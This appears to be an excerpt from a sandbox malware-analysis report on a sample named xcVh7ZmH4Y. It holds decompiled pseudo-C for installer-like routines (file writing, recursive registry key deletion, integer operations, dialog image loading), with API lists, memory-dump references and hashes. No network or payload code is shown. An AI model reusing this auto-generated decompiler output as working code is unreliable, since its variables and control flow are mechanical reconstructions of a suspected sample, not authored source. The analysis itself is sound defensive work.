                                                0x7354267d
                                                0x7354267d
                                                0x73542685
                                                0x7354268c
                                                0x73542692
                                                0x00000000
                                                0x73542699
                                                0x00000000
                                                0x00000000
                                                0x735426a1
                                                0x735426a5
                                                0x735426a8
                                                0x735426ac
                                                0x735426b3
                                                0x735426b7
                                                0x735426bd
                                                0x735426bf
                                                0x735426c1
                                                0x735426c1
                                                0x735426c8
                                                0x00000000
                                                0x00000000
                                                0x735426d1
                                                0x00000000
                                                0x00000000
                                                0x735426d8
                                                0x735426de
                                                0x735426e8
                                                0x735426ee
                                                0x735426f3
                                                0x00000000
                                                0x00000000
                                                0x73542714
                                                0x00000000
                                                0x00000000
                                                0x735426fa
                                                0x73542700
                                                0x73542701
                                                0x73542703
                                                0x00000000
                                                0x00000000
                                                0x7354271c
                                                0x7354271e
                                                0x73542724
                                                0x7354272a
                                                0x7354272a
                                                0x00000000
                                                0x00000000
                                                0x73542692
                                                0x7354272d
                                                0x7354272d
                                                0x73542732
                                                0x73542743
                                                0x73542743
                                                0x73542749
                                                0x7354274e
                                                0x73542753
                                                0x7354275f
                                                0x73542764
                                                0x00000000
                                                0x73542769
                                                0x73542755
                                                0x73542756
                                                0x7354276a
                                                0x7354276a
                                                0x73542753
                                                0x7354276b
                                                0x7354276c
                                                0x7354276f
                                                0x73542783

                                                APIs
                                                  • Part of subcall function 735412BB: GlobalAlloc.KERNEL32(00000040,?,735412DB,?,7354137F,00000019,735411CA,-000000A0), ref: 735412C5
                                                • GlobalFree.KERNEL32 ref: 73542743
                                                • GlobalFree.KERNEL32 ref: 73542778
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 70e91ee63061fe1fbff9d6dc6d7b1c81287d2382b14d5bdecbc18fa15bcb4bb8
                                                • Instruction ID: 84cb97cc01717acdf9ab550529962d6152808339a5f8652402134172841a54f8
                                                • Opcode Fuzzy Hash: 70e91ee63061fe1fbff9d6dc6d7b1c81287d2382b14d5bdecbc18fa15bcb4bb8
                                                • Instruction Fuzzy Hash: A53126B2104129DFD71EAF55EAC4F2E77BAFB85300324692DF109C7250D7305816DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
                                                				WCHAR* _t26;
                                                				void* _t29;
                                                				long _t37;
                                                				int _t49;
                                                				void* _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                				void* _t61;
                                                
                                                				_t49 = __ebx;
                                                				_t52 = 0xfffffd66;
                                                				_t26 = E00402DA6(0xfffffff0);
                                                				_t55 = _t26;
                                                				 *(_t61 - 0x40) = _t26;
                                                				if(E00405E83(_t26) == 0) {
                                                					E00402DA6(0xffffffed);
                                                				}
                                                				E00406008(_t55);
                                                				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                				 *(_t61 + 8) = _t29;
                                                				if(_t29 != 0xffffffff) {
                                                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                					if( *(_t61 - 0x28) != _t49) {
                                                						_t37 =  *0x434f14;
                                                						 *(_t61 - 0x44) = _t37;
                                                						_t54 = GlobalAlloc(0x40, _t37);
                                                						if(_t54 != _t49) {
                                                							E004034E5(_t49);
                                                							E004034CF(_t54,  *(_t61 - 0x44));
                                                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                							 *(_t61 - 0x10) = _t59;
                                                							if(_t59 != _t49) {
                                                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                								while( *_t59 != _t49) {
                                                									_t60 = _t59 + 8;
                                                									 *(_t61 - 0x3c) =  *_t59;
                                                									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                									_t59 = _t60 +  *(_t61 - 0x3c);
                                                								}
                                                								GlobalFree( *(_t61 - 0x10));
                                                							}
                                                							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                							GlobalFree(_t54);
                                                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                						}
                                                					}
                                                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                					CloseHandle( *(_t61 + 8));
                                                				}
                                                				_t56 = 0xfffffff3;
                                                				if(_t52 < _t49) {
                                                					_t56 = 0xffffffef;
                                                					DeleteFileW( *(_t61 - 0x40));
                                                					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                				}
                                                				_push(_t56);
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                				return 0;
                                                			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32 ref: 00402A06
                                                • GlobalFree.KERNEL32 ref: 00402A19
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E73541979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x7354506c = _a8;
                                                				_t77 = 0;
                                                				 *0x73545070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E735412E3();
                                                				_t90 = E735413B1(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E735412E3();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E735412E3();
                                                					_t77 = E735413B1(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81 & 0x0000ffff;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E73541510(_t85, _t90, _t87,  &_v76);
                                                								E73541312( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E73543050(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
                                                						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                							_t48 = E73543070(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E735430A0(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E73542EE0(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E73542F90(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                					if( *((short*)(_t81 + 2)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E73542EA0(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}





























                                                0x73541979
                                                0x73541983
                                                0x7354198c
                                                0x7354198f
                                                0x73541994
                                                0x7354199d
                                                0x735419a6
                                                0x735419a8
                                                0x735419af
                                                0x735419b1
                                                0x735419b4
                                                0x735419bb
                                                0x735419c9
                                                0x735419d2
                                                0x735419d7
                                                0x735419da
                                                0x735419e0
                                                0x735419e0
                                                0x735419e3
                                                0x735419e6
                                                0x735419e9
                                                0x73541ab1
                                                0x73541ab1
                                                0x73541ab4
                                                0x73541b34
                                                0x73541b39
                                                0x73541b48
                                                0x73541b4b
                                                0x73541b53
                                                0x73541b53
                                                0x73541b53
                                                0x73541b55
                                                0x73541b55
                                                0x73541b56
                                                0x73541b56
                                                0x73541b58
                                                0x73541b5a
                                                0x73541b60
                                                0x73541b69
                                                0x73541b7a
                                                0x73541b85
                                                0x73541b85
                                                0x73541b4d
                                                0x73541b2f
                                                0x73541b2f
                                                0x73541b31
                                                0x73541b31
                                                0x00000000
                                                0x73541b31
                                                0x73541b4f
                                                0x73541b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541b51
                                                0x73541b3d
                                                0x73541b41
                                                0x00000000
                                                0x73541b41
                                                0x73541ab6
                                                0x73541ab6
                                                0x73541ab7
                                                0x73541b26
                                                0x73541b28
                                                0x00000000
                                                0x00000000
                                                0x73541b2a
                                                0x73541b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541b2d
                                                0x73541ab9
                                                0x73541ab9
                                                0x73541aba
                                                0x73541af7
                                                0x73541afc
                                                0x73541b19
                                                0x73541b1c
                                                0x00000000
                                                0x00000000
                                                0x73541b1e
                                                0x00000000
                                                0x00000000
                                                0x73541b20
                                                0x73541b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541b24
                                                0x73541afe
                                                0x73541b03
                                                0x73541b05
                                                0x73541b07
                                                0x73541b09
                                                0x73541b12
                                                0x73541b0b
                                                0x73541b0b
                                                0x73541b0b
                                                0x00000000
                                                0x73541b09
                                                0x73541abc
                                                0x73541abc
                                                0x73541abf
                                                0x73541af0
                                                0x73541af2
                                                0x00000000
                                                0x73541af2
                                                0x73541ac1
                                                0x73541ac1
                                                0x73541ac4
                                                0x73541ad7
                                                0x73541adc
                                                0x73541ae9
                                                0x73541aeb
                                                0x00000000
                                                0x73541aeb
                                                0x73541ade
                                                0x73541ae0
                                                0x00000000
                                                0x00000000
                                                0x73541ae2
                                                0x73541ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541ae7
                                                0x73541ac7
                                                0x73541ac8
                                                0x73541ace
                                                0x73541ad0
                                                0x73541ad0
                                                0x00000000
                                                0x73541ac8
                                                0x735419ef
                                                0x73541a68
                                                0x73541a6a
                                                0x73541a6d
                                                0x73541a8b
                                                0x73541a8e
                                                0x73541a94
                                                0x73541a99
                                                0x73541a6f
                                                0x73541a6f
                                                0x73541a73
                                                0x73541a77
                                                0x73541a79
                                                0x73541a79
                                                0x73541a9c
                                                0x73541aa0
                                                0x00000000
                                                0x73541aa6
                                                0x73541aa6
                                                0x73541aa9
                                                0x00000000
                                                0x73541aa9
                                                0x73541aa0
                                                0x735419f1
                                                0x735419f4
                                                0x73541a59
                                                0x73541a5b
                                                0x73541a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541a63
                                                0x735419f6
                                                0x735419f9
                                                0x00000000
                                                0x00000000
                                                0x735419fb
                                                0x735419fc
                                                0x73541a32
                                                0x73541a37
                                                0x73541a4f
                                                0x73541a51
                                                0x00000000
                                                0x73541a51
                                                0x73541a39
                                                0x73541a3b
                                                0x00000000
                                                0x00000000
                                                0x73541a41
                                                0x73541a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541a4a
                                                0x735419fe
                                                0x73541a01
                                                0x73541a28
                                                0x00000000
                                                0x73541a03
                                                0x73541a03
                                                0x73541a04
                                                0x73541a18
                                                0x73541a1a
                                                0x73541a06
                                                0x73541a08
                                                0x73541a0e
                                                0x73541a10
                                                0x73541a10
                                                0x73541a08
                                                0x00000000
                                                0x73541a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: b4ae362ef2d4f8bcb15338e14918353e27145ed535236aa0b308e270f194ca8e
                                                • Instruction ID: 6a27c1876538b6806ba91c79c607e46a84ecd81a9791198ff3838b47571149af
                                                • Opcode Fuzzy Hash: b4ae362ef2d4f8bcb15338e14918353e27145ed535236aa0b308e270f194ca8e
                                                • Instruction Fuzzy Hash: 1B515B32D00218ABCB0EAFA5F54479D77BAEB80348F34655AD80AB3294F771AB418791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				short _v536;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v536);
                                                						_push(0);
                                                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v536);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E0040690A(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyW(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				WCHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t60;
                                                				long _t63;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                				} else {
                                                					E00402D84(2);
                                                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x24);
                                                				 *(_t65 + 8) = _t30;
                                                				_t60 = _t55 & 0x00000004;
                                                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402DA6(0x11);
                                                				}
                                                				 *(_t65 - 0x44) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                				asm("sbb esi, esi");
                                                				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                					_push(_t63);
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
